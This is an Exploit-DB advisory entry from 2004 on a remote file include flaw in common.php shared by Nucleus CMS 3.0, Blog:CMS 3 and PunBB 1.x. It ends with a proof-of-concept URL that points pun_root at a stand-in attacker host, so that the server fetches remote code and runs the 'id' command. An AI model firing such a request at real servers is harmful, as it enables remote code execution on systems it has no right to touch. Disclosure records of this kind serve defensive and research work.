Nucleus CMS 3.0,Blog:CMS 3,PunBB 1.x Common.PHP Remote File Include Vulnerability

2004-07-20T00:00:00
ID EDB-ID:24296
Type exploitdb
Reporter Radek Hulan
Modified 2004-07-20T00:00:00

Description

Nucleus CMS 3.0,Blog:CMS 3,PunBB 1.x Common.PHP Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/10760/info

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

Input passed to the 'common.php' script is not sufficiently sanitized.

All three applications are vulnerable because they have a similar or identical code base.

http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id